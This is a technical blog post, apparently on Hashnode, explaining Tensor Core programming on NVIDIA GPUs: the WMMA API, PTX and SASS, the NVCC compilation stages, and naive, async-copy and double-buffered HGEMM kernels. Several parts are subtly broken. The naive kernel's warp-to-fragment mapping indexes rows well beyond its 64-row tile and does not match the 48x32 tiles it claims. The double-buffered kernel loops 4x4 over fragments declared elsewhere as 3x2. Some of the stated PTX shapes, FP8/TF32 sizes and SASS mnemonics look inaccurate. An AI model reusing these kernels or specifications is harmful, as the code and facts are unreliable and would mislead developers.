<p>Each Tensor Core executes matrix multiplications using warp-level HMMA instructions like <code>HMMA.16x8x16</code> or <code>HMMA.8x8x8</code>, denoting matrix tile sizes and operand types. In Hopper, an SM can issue one such operation per cycle per Tensor Core, with four Tensor Cores per SM. Pipelining and warp scheduling allow latency hiding and high occupancy, especially when paired with TMA’s low-latency data loads and async barriers. This design minimizes idle cycles and register pressure while sustaining high throughput.</p>
<h1 id="heading-programming-tensor-cores">Programming Tensor Cores</h1>
<p>When you're writing Tensor Core code, you're really working with three different levels at once. The first layer is the C++ API that wraps everything in nice clean abstraction, the next one is the PTX instructions that give you precise control over what the hardware does, then the actual SASS machine code that runs on the silicon.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1738579948361/a4f6e1f0-f6b6-4ecf-a5ff-e9bef1e0ae4d.png" alt class="image--center mx-auto" /></p>
<p>At the top level, NVIDIA gives us the WMMA (Warp Matrix Multiply Accumulate) API in CUDA C++. It's defined in mma.h under your CUDA include directory (typically CUDA/v12.0/include/crt/mma.h). The basic building block here is something called a "fragment" - think of it as a chunk of a matrix that maps nicely to what the Tensor Cores can process. Each fragment represents a warp-collective operation where all 32 threads in a warp work together, each holding specific matrix elements in their registers.</p>
<pre><code class="lang-c"><span class="hljs-comment">// First we declare our fragments - these map to registers in a warp</span>
nvcuda::wmma::fragment&lt;nvcuda::wmma::matrix_a, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half, nvcuda::wmma::row_major&gt; frag_a;
nvcuda::wmma::fragment&lt;nvcuda::wmma::matrix_b, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half, nvcuda::wmma::row_major&gt; frag_b;
nvcuda::wmma::fragment&lt;nvcuda::wmma::accumulator, <span class="hljs-number">16</span>,<span class="hljs-number">16</span>,<span class="hljs-number">16</span>, half&gt; frag_c;

<span class="hljs-comment">// Initialize the accumulator fragment to zero</span>
nvcuda::wmma::fill_fragment(frag_c, <span class="hljs-number">0.0f</span>);

<span class="hljs-comment">// Load matrix data from memory into fragments</span>
nvcuda::wmma::load_matrix_sync(frag_a, ptrA, strideA);
nvcuda::wmma::load_matrix_sync(frag_b, ptrB, strideB);

<span class="hljs-comment">// Do the matrix multiply-accumulate</span>
nvcuda::wmma::mma_sync(frag_c, frag_a, frag_b, frag_c);

<span class="hljs-comment">// Store results back to memory</span>
nvcuda::wmma::store_matrix_sync(ptrC, frag_c, strideC, nvcuda::wmma::mem_row_major);
</code></pre>
<p>Those template parameters tell the compiler exactly what size of matrix operation we want. On Hopper, we can do 16x16x16 for FP16/BF16, 16x16x32 for the new FP8 format, and 16x8x32 for TF32 and several other combinations. The available sizes have evolved: Volta introduced 16x16x16, Turing added 16x8x8, Ampere brought 16x8x16 with sparsity support, and Hopper expanded to include FP8 configurations.</p>
<p>When we compile that C++ code, the journey begins with NVCC. First, your .cu file gets preprocessed using cl.exe on Windows or gcc on Linux, expanding macros and handling includes, creating a .cpp4.ii file. Then cudafe++ analyzes this preprocessed code to separate device and host portions, generating .cudafe1.cpp for device code. This separation is crucial - host code will be compiled by your normal C++ compiler, while device code needs special handling.</p>
<p>Now we enter the PTX phase. PTX is NVIDIA's intermediate representation - kind of like GPU assembly but not quite machine code yet. For those familiar with LLVM, PTX shares similarities with LLVM's Intermediate Representation (IR). While LLVM's project scope has expanded beyond its original "virtual machine" naming, its core concept of IR remains analogous to PTX. IR acts as a bridge between frontend programming languages and backend machine code, simplifying support for new languages and hardware targets while enabling cross-platform optimizations. PTX serves as NVIDIA's "CUDA IR," connecting high-level CUDA C++ code with low-level GPU SASS instructions. This abstraction allows NVIDIA to implement runtime optimizations via tools like NVRTC and generate device-agnostic code.</p>
<p>The cicc compiler takes our separated device code and generates PTX, using virtual architecture flags (like -arch compute_70) to determine what features are available. This creates a .ptx file containing instructions that are still somewhat readable but much closer to the hardware:</p>
<pre><code class="lang-c"><span class="hljs-comment">// FP8 (new in Hopper!)</span>
mma.sync.aligned.m16n16k32.row.col.f16.e4m3.e4m3.f16 d, a, b, c;  <span class="hljs-comment">// 4-bit exp, 3-bit mantissa</span>
mma.sync.aligned.m16n16k32.row.col.f16.e5m2.e5m2.f16 d, a, b, c;  <span class="hljs-comment">// 5-bit exp, 2-bit mantissa</span>

<span class="hljs-comment">// FP16</span>
mma.sync.aligned.m16n8k16.row.col.f16.f16.f16.f16 d, a, b, c;

<span class="hljs-comment">// TF32</span>
mma.sync.aligned.m16n8k8.row.col.f32.tf32.tf32.f32 d, a, b, c;
</code></pre>
<p>Each part of these PTX instructions has meaning: 'sync' means all threads participate, 'aligned' indicates memory alignment requirements, the shape (m16n8k16) defines matrix dimensions, and the data types specify the precision for each operand.</p>
<p>The ldmatrix instruction is fascinating - it's way more flexible than the old wmma.load. Instead of being locked into loading data with a fixed stride, we can specify exactly where each group of 4 threads should load from. This is crucial for avoiding shared memory bank conflicts:</p>
<pre><code class="lang-c">ldmatrix.sync.aligned.x4.m8n8.shared.b16 rd, [addr];
</code></pre>
<p>Though CUDA developers may not directly interact with PTX, it plays a critical role under the hood. When compiling CUDA code with NVCC, .ptx files are generated during the device code compilation phase. These files represent the optimized intermediate code before final translation to SASS (the GPU's native instruction set). PTX also enables the magic of forward compatibility - code compiled today can run on future GPUs through JIT compilation.</p>
<p>The next step is where ptxas comes in. This assembler takes PTX and generates actual machine code (SASS) for specific GPU architectures, using physical architecture flags like -arch=sm_90. The output is a .cubin file containing binary code that can run directly on the target GPU.</p>
<p>Finally, we get to what actually runs on the hardware: SASS instructions. On Hopper (compute capability 9.0), there are specialized HMMA (Half-precision Matrix Multiply-Accumulate) instructions for each data format:</p>
<pre><code class="lang-c">HMMA<span class="hljs-number">.1616</span>.F16  <span class="hljs-comment">// for FP16/BF16</span>
HMMA<span class="hljs-number">.1632</span>.F8   <span class="hljs-comment">// for the new FP8 format</span>
HMMA<span class="hljs-number">.168</span>.F32   <span class="hljs-comment">// for TF32</span>
LDSM<span class="hljs-number">.16</span>.M88<span class="hljs-number">.4</span>  <span class="hljs-comment">// Load from Shared Memory for matrix operations</span>
</code></pre>
<p>What's cool is each encoding is tuned for its specific format. The FP8 instruction (HMMA.1632.F8) can process twice as much data per instruction because the numbers are half the size. This is how Hopper achieves that 4x speedup for FP8 operations compared to FP16 on previous generations.</p>
<p>The journey doesn't end with a single cubin file. fatbinary packages together multiple architecture versions (like sm_70, sm_80, sm_90 cubins) along with PTX code for forward compatibility, creating a .fatbin file. This gets embedded into your host executable, allowing the CUDA runtime to select the best version at runtime based on the actual GPU present. The host code, meanwhile, has been compiled by your regular C++ compiler and linked with CUDA runtime libraries. The final executable contains both host code and the embedded fatbinary, ready to run on a variety of GPU architectures.</p>
<p>For fp16 type, the matrix load and matrix multiplication operations mentioned above are compiled into LSDM instructions and HMMA instructions. These SASS instructions directly map to the physical Tensor Core hardware units, with each SM containing multiple Tensor Cores that can execute these specialized matrix operations in parallel.</p>
<h1 id="heading-implementations">Implementations</h1>
<h2 id="heading-naive-kernel">Naive Kernel</h2>
<p>The baseline implementation utilizes the C API for Tensor Cores, but with alternative tiling parameters BM = 64, BN = 128, BK = 64, and 256 threads per block. This configuration provides different memory access patterns and computational balance compared to the more common BM = 128, BN = 256, BK = 32 approach.</p>
<pre><code class="lang-cpp"><span class="hljs-function">__global__ <span class="hljs-keyword">void</span> <span class="hljs-title">hgemm_naive</span><span class="hljs-params">(
    half * __restrict__ a, half * __restrict__ b, half * __restrict__ c,
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> M, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> N, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> K)</span> </span>{
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BM = <span class="hljs-number">64</span>;
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BN = <span class="hljs-number">128</span>; 
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BK = <span class="hljs-number">64</span>;

    <span class="hljs-keyword">int</span> bx = blockIdx.x;
    <span class="hljs-keyword">int</span> by = blockIdx.y;
    <span class="hljs-keyword">int</span> tid = threadIdx.x;
    <span class="hljs-keyword">int</span> wid = tid &gt;&gt; <span class="hljs-number">5</span>;

    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> APAD = <span class="hljs-number">8</span>;
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> BPAD = <span class="hljs-number">8</span>;

    __shared__ half s_a[BM][BK + APAD];
    __shared__ half s_b[BK][BN + BPAD];

    <span class="hljs-comment">// Using a 3x2 grid of fragments per warp instead of 4x4</span>
    <span class="hljs-comment">// This maps differently to the output matrix based on the new tiling dimensions</span>
    wmma::fragment&lt;wmma::matrix_a, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, half, wmma::row_major&gt; frag_a[<span class="hljs-number">2</span>][<span class="hljs-number">3</span>];
    wmma::fragment&lt;wmma::matrix_b, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, half, wmma::row_major&gt; frag_b[<span class="hljs-number">2</span>][<span class="hljs-number">3</span>];
    wmma::fragment&lt;wmma::accumulator, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, <span class="hljs-number">16</span>, half&gt; frag_c[<span class="hljs-number">3</span>][<span class="hljs-number">2</span>];

    <span class="hljs-comment">// Initialize accumulator fragments to zero</span>
    <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">3</span>; i++) {
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
            wmma::fill_fragment(frag_c[i][j], <span class="hljs-number">0.0</span>);
        }
    }

    <span class="hljs-comment">// Thread mapping with BM=64, we need different load calculations</span>
    <span class="hljs-keyword">int</span> load_a_smem_m = (tid % <span class="hljs-number">16</span>) * <span class="hljs-number">4</span>; <span class="hljs-comment">// Interleaved row assignment</span>
    <span class="hljs-keyword">int</span> load_a_smem_k = (tid / <span class="hljs-number">16</span>) * <span class="hljs-number">4</span>; <span class="hljs-comment">// Distribute across K dimension</span>
    <span class="hljs-keyword">int</span> load_b_smem_k = (tid / <span class="hljs-number">32</span>) * <span class="hljs-number">8</span>; <span class="hljs-comment">// Different mapping for larger BK</span>
    <span class="hljs-keyword">int</span> load_b_smem_n = (tid % <span class="hljs-number">32</span>) * <span class="hljs-number">4</span>; <span class="hljs-comment">// Distribute within a warp across N</span>

    <span class="hljs-keyword">int</span> load_a_gmem_m = by * BM + load_a_smem_m;
    <span class="hljs-keyword">int</span> load_b_gmem_n = bx * BN + load_b_smem_n;

    <span class="hljs-keyword">int</span> load_a_gmem_addr = load_a_gmem_m * K + load_a_smem_k;
    <span class="hljs-keyword">int</span> load_b_gmem_addr = load_b_smem_k * N + load_b_gmem_n;

    <span class="hljs-comment">// Modified warp assignment for 3x2 grid</span>
    <span class="hljs-comment">// Each warp computes a 48x32 output tile (vs 64x64 in the original)</span>
    <span class="hljs-keyword">int</span> comp_c_frag_m = (wid / <span class="hljs-number">2</span>) * <span class="hljs-number">3</span>; <span class="hljs-comment">// Maps to beginning of vertical fragment group</span>
    <span class="hljs-keyword">int</span> comp_c_frag_n = (wid % <span class="hljs-number">2</span>) * <span class="hljs-number">2</span>; <span class="hljs-comment">// Maps to beginning of horizontal fragment group</span>

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> bk = <span class="hljs-number">0</span>; bk &lt; K / BK; bk++) {
        <span class="hljs-comment">// Load A tile into shared memory (4 elements per thread)</span>
        <span class="hljs-keyword">if</span> (load_a_gmem_m &lt; M &amp;&amp; load_a_smem_k &lt; BK) {
            FLOAT4(s_a[load_a_smem_m][load_a_smem_k]) = 
                FLOAT4(a[load_a_gmem_addr]);
        }

        <span class="hljs-comment">// Load B tile into shared memory (4 elements per thread)</span>
        <span class="hljs-keyword">if</span> (load_b_smem_k &lt; BK &amp;&amp; load_b_gmem_n &lt; N) {
            FLOAT4(s_b[load_b_smem_k][load_b_smem_n]) = 
                FLOAT4(b[load_b_gmem_addr]);
        }

        load_a_gmem_addr += BK;
        load_b_gmem_addr += BK * N;

        __syncthreads();

        <span class="hljs-comment">// Load matrix data from shared memory into Tensor Core fragments</span>
        <span class="hljs-comment">// 3x2 fragment grid requires different addressing pattern</span>
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">3</span>; i++) {
            wmma::load_matrix_sync(frag_a[<span class="hljs-number">0</span>][i], 
                &amp;s_a[(comp_c_frag_m + i) * <span class="hljs-number">16</span>][<span class="hljs-number">0</span>], BK + APAD);
            wmma::load_matrix_sync(frag_a[<span class="hljs-number">1</span>][i], 
                &amp;s_a[(comp_c_frag_m + i) * <span class="hljs-number">16</span>][<span class="hljs-number">32</span>], BK + APAD);
        }

        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">2</span>; i++) {
            wmma::load_matrix_sync(frag_b[<span class="hljs-number">0</span>][i], 
                &amp;s_b[<span class="hljs-number">0</span>][(comp_c_frag_n + i) * <span class="hljs-number">16</span>], BN + BPAD);
            wmma::load_matrix_sync(frag_b[<span class="hljs-number">1</span>][i], 
                &amp;s_b[<span class="hljs-number">32</span>][(comp_c_frag_n + i) * <span class="hljs-number">16</span>], BN + BPAD);
        }

        <span class="hljs-comment">// Execute matrix multiply-accumulate operations</span>
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">3</span>; i++) {
            <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
                wmma::mma_sync(frag_c[i][j], frag_a[<span class="hljs-number">0</span>][i], frag_b[<span class="hljs-number">0</span>][j], frag_c[i][j]);
                wmma::mma_sync(frag_c[i][j], frag_a[<span class="hljs-number">1</span>][i], frag_b[<span class="hljs-number">1</span>][j], frag_c[i][j]);
            }
        }

        __syncthreads();
    }

    <span class="hljs-comment">// Store results back to global memory</span>
    <span class="hljs-keyword">int</span> store_c_gmem_m = by * BM + (comp_c_frag_m * <span class="hljs-number">16</span>);
    <span class="hljs-keyword">int</span> store_c_gmem_n = bx * BN + (comp_c_frag_n * <span class="hljs-number">16</span>);

    <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">3</span>; i++) {
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">2</span>; j++) {
            <span class="hljs-keyword">if</span> (store_c_gmem_m + i * <span class="hljs-number">16</span> &lt; M &amp;&amp; store_c_gmem_n + j * <span class="hljs-number">16</span> &lt; N) {
                wmma::store_matrix_sync(
                    &amp;c[(store_c_gmem_m + i * <span class="hljs-number">16</span>) * N + (store_c_gmem_n + j * <span class="hljs-number">16</span>)], 
                    frag_c[i][j], N, wmma::mem_row_major);
            }
        }
    }
}
</code></pre>
<p>The kernel implements a 3×2 fragment grid per warp instead of the traditional 4×4, resulting in 48×32 output tiles per warp. It also uses interleaved row assignment for matrix A to better balance the workload across threads. Then it includes bounds checking to handle edge cases, important for matrices that aren't neatly divisible by the tile dimensions. Finally, it implements a different thread-to-data mapping to accommodate the modified tile dimensions.</p>
<p>The increased BK dimension (64 vs 32) reduces the number of iterations in the main loop, potentially increasing computational intensity at the expense of requiring more shared memory per iteration. This tradeoff can be beneficial depending on the matrix dimensions and hardware characteristics..</p>
<h2 id="heading-asynchronous-copy-cpasync-and-pointer-conversions">Asynchronous Copy (cp.async) and Pointer Conversions</h2>
<p>The first significant optimization introduces asynchronous memory copy operations using PTX inline assembly. The key addition here is the use of <code>__cvta_generic_to_shared()</code> to convert generic pointers to shared memory addresses required by the PTX inline assembly.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744193507339/f463b971-9c16-4ff7-95b8-c1f587245776.png" alt class="image--center mx-auto" /></p>
<p>This is a critical step because the pointer (8 bytes) obtained using SMEM is generic, directly using this 8-byte value as the address of shared memory <a target="_blank" href="https://forums.developer.nvidia.com/t/problem-about-ptx-instruction-cp-async-ca-shared-global/224219">may exceed the address range of shared memory</a>.</p>
<pre><code class="lang-cpp"><span class="hljs-function">__global__ <span class="hljs-keyword">void</span> <span class="hljs-title">hgemm_async</span><span class="hljs-params">(
    half * __restrict__ a, half * __restrict__ b, half * __restrict__ c,
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> M, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> N, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> K)</span> </span>{
    <span class="hljs-comment">// Initial setup and declarations, same as naive kernel</span>
    <span class="hljs-comment">// ...</span>
    <span class="hljs-keyword">int</span> s_a_base_addr = __cvta_generic_to_shared(s_a[<span class="hljs-number">0</span>]);
    <span class="hljs-keyword">int</span> s_b_base_addr = __cvta_generic_to_shared(s_b[<span class="hljs-number">0</span>]);
    <span class="hljs-keyword">int</span> load_a_smem_addr_0 = s_a_base_addr + OFFSET(load_a_smem_m, load_a_smem_k, BK + APAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_a_smem_addr_1 = load_a_smem_addr_0 + (BK + APAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_b_smem_addr_0 = s_b_base_addr + OFFSET(load_b_smem_k, load_b_smem_n, BN + BPAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_b_smem_addr_1 = load_b_smem_addr_0 + (BN + BPAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_b_smem_addr_2 = load_b_smem_addr_0 + <span class="hljs-number">2</span> * (BN + BPAD) * <span class="hljs-keyword">sizeof</span>(half);
    <span class="hljs-keyword">int</span> load_b_smem_addr_3 = load_b_smem_addr_0 + <span class="hljs-number">3</span> * (BN + BPAD) * <span class="hljs-keyword">sizeof</span>(half);

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> bk = <span class="hljs-number">0</span>; bk &lt; K / BK; bk++) {
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_0), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_1), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr +     K]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_0), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_1), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr +     N]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_2), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr + <span class="hljs-number">2</span> * N]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_3), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr + <span class="hljs-number">3</span> * N]));

        load_a_gmem_addr += BK;
        load_b_gmem_addr += BK * N;

        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.commit_group;\n"</span> ::);
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.wait_group 0;\n"</span> ::);

        __syncthreads();

        <span class="hljs-comment">// Matrix loading and multiplication code remains the same as last one</span>
        <span class="hljs-comment">// ...</span>
    }
}
</code></pre>
<p>Instead of using the FLOAT4 macro to load data, we now use the <code>cp.async.ca.shared.global</code> PTX instruction. This instruction initiates asynchronous memory transfers from global memory to shared memory. The transfers are grouped with <code>cp.async.commit_group</code> and then we wait for completion with <code>cp.async.wait_group 0</code>.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1744355523915/d997140b-f27c-4092-a9cc-be173a5e5284.png" alt class="image--center mx-auto" /></p>
<p>The implementation of asynchronous memory transfers alters the data movement pipeline in the GPU by leveraging specialized hardware capabilities available in Ampere and later architectures. The <code>cp.async.ca.shared.global</code> PTX instruction establishes a direct hardware path between global memory and shared memory, bypassing the general-purpose load/store units and eliminating the need for temporary register storage. This dedicated hardware path in Ampere reduces the memory latency and power consumption associated with transfers by removing intermediate register footprint and allocation overhead.</p>
<p>The async copy operations introduce a relaxed memory coherence model managed through explicit synchronization primitives. The <code>cp.async.commit_group</code> instruction bundles issued memory operations into a transaction group that can be collectively tracked. The <code>cp.async.wait_group 0</code> instruction represents a strict synchronization point, forcing execution to stall until the most recently committed group completes. This waiting mechanism ensures correct access ordering but doesn't permit significant asynchronous overlap in this implementation.</p>
<p>Each thread issues fixed-width 16-byte (8 half-precision elements) transfers through the async copy instructions. With 256 threads, this allows a theoretical transfer capacity of 4KB per instruction set. The memory coalescing hardware combines multiple adjacent 16-byte requests into larger memory transactions when possible, reducing the number of actual DRAM operations required.</p>
<p>The "ca" (cache all) hint in <code>cp.async.ca.shared.global</code> indicates that data should be cached at all applicable levels of the memory hierarchy. This maximizes temporal locality benefits for this data pattern which features repeated access to the same memory regions across thread blocks.</p>
<h2 id="heading-double-buffering">Double Buffering</h2>
<p>The next optimization implements double buffering to more effectively overlap computation with memory transfers. Double buffering represents a classical software pipelining technique that dramatically improves the overlap between computation and memory operations. By maintaining two buffers in shared memory for each input matrix, the kernel can simultaneously compute using data from one buffer while loading the next iteration's data into the alternate buffer. This effectively creates a two-stage pipeline where memory operations and computations occur in parallel.</p>
<p>The core idea is to use two separate buffers for the input matrices, alternating between them for loading and computing. The key change here is the use of dynamic shared memory with <code>extern __shared__ half smem[];</code>. We partition this memory to create two buffers each for matrices A and B. The offset variables <code>s_a_db_offset</code> and <code>s_b_db_offset</code> will be used to select the appropriate buffer.</p>
<pre><code class="lang-cpp"><span class="hljs-function">__global__ <span class="hljs-keyword">void</span> <span class="hljs-title">hgemm_doublebuff</span><span class="hljs-params">(
    half * __restrict__ a, half * __restrict__ b, half * __restrict__ c,
    <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> M, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> N, <span class="hljs-keyword">const</span> <span class="hljs-keyword">int</span> K)</span> </span>{
    <span class="hljs-comment">// similar initial setup as last one</span>
    <span class="hljs-comment">// ...</span>
    <span class="hljs-keyword">extern</span> __shared__ half smem[];
    half *s_a = smem;
    half *s_b = smem + <span class="hljs-number">2</span> * BM * (BK + APAD);
    <span class="hljs-keyword">int</span> s_a_db_offset = BM * (BK + APAD);
    <span class="hljs-keyword">int</span> s_b_db_offset = BK * (BN + BPAD);

    <span class="hljs-comment">// initial load into first buffer</span>
    {
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_0), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_1), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr +     K]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_0), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_1), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr +     N]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_2), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr + <span class="hljs-number">2</span> * N]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_b_smem_addr_3), <span class="hljs-string">"l"</span>(&amp;b[load_b_gmem_addr + <span class="hljs-number">3</span> * N]));

        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.commit_group;\n"</span> ::);
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.wait_group 0;\n"</span> ::);
        __syncthreads();
    }

    <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> bk = <span class="hljs-number">1</span>; bk &lt; K / BK; bk++) {
        <span class="hljs-keyword">int</span> smem_sel = (bk &amp; <span class="hljs-number">1</span>) ^ <span class="hljs-number">1</span>;
        <span class="hljs-keyword">int</span> smem_sel_next = ((bk - <span class="hljs-number">1</span>) &amp; <span class="hljs-number">1</span>) ^ <span class="hljs-number">1</span>;

        load_a_gmem_addr += BK;
        load_b_gmem_addr += BK * N;

        <span class="hljs-comment">// load next iteration's data into alternate buffer</span>
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_0 + smem_sel_next * s_a_db_offset * (<span class="hljs-keyword">int</span>)<span class="hljs-keyword">sizeof</span>(half)), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr        ]));
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.ca.shared.global [%0], [%1], 16;\n"</span> :
            : <span class="hljs-string">"r"</span>(load_a_smem_addr_1 + smem_sel_next * s_a_db_offset * (<span class="hljs-keyword">int</span>)<span class="hljs-keyword">sizeof</span>(half)), <span class="hljs-string">"l"</span>(&amp;a[load_a_gmem_addr +     K]));
        <span class="hljs-comment">// ... more async copy instructions for the next buffer</span>

        <span class="hljs-comment">// compute using the current buffer</span>
        wmma::load_matrix_sync(frag_a[<span class="hljs-number">0</span>][<span class="hljs-number">0</span>], &amp;s_a[smem_sel * s_a_db_offset + (comp_c_frag_m * <span class="hljs-number">64</span>     ) * (BK + APAD) +  <span class="hljs-number">0</span>], BK + APAD);
        wmma::load_matrix_sync(frag_a[<span class="hljs-number">0</span>][<span class="hljs-number">1</span>], &amp;s_a[smem_sel * s_a_db_offset + (comp_c_frag_m * <span class="hljs-number">64</span> + <span class="hljs-number">16</span>) * (BK + APAD) +  <span class="hljs-number">0</span>], BK + APAD);
        <span class="hljs-comment">// ... more Tensor Core load operations</span>

        <span class="hljs-comment">// matrix multiply operations</span>
        <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
        <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> i = <span class="hljs-number">0</span>; i &lt; <span class="hljs-number">4</span>; i++) {
            <span class="hljs-meta">#<span class="hljs-meta-keyword">pragma</span> unroll</span>
            <span class="hljs-keyword">for</span> (<span class="hljs-keyword">int</span> j = <span class="hljs-number">0</span>; j &lt; <span class="hljs-number">4</span>; j++) {
                wmma::mma_sync(frag_c[i][j], frag_a[<span class="hljs-number">0</span>][i], frag_b[<span class="hljs-number">0</span>][j], frag_c[i][j]);
                wmma::mma_sync(frag_c[i][j], frag_a[<span class="hljs-number">1</span>][i], frag_b[<span class="hljs-number">1</span>][j], frag_c[i][j]);
            }
        }

        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.commit_group;\n"</span> ::);
        <span class="hljs-keyword">asm</span> (<span class="hljs-string">"cp.async.wait_group 0;\n"</span> ::);
        __syncthreads();
    }

    <span class="hljs-comment">// Process final buffer</span>
    <span class="hljs-comment">// ...</span>
}
</code></pre>
<p>The main computation loop now includes buffer selection logic. The variables <code>smem_sel</code> and <code>smem_sel_next</code> toggle between 0 and 1 to select the appropriate buffer for the current and next iterations. While we're computing using the current buffer (<code>smem_sel</code>), we're loading data into the next buffer (<code>smem_sel_next</code>).</p>
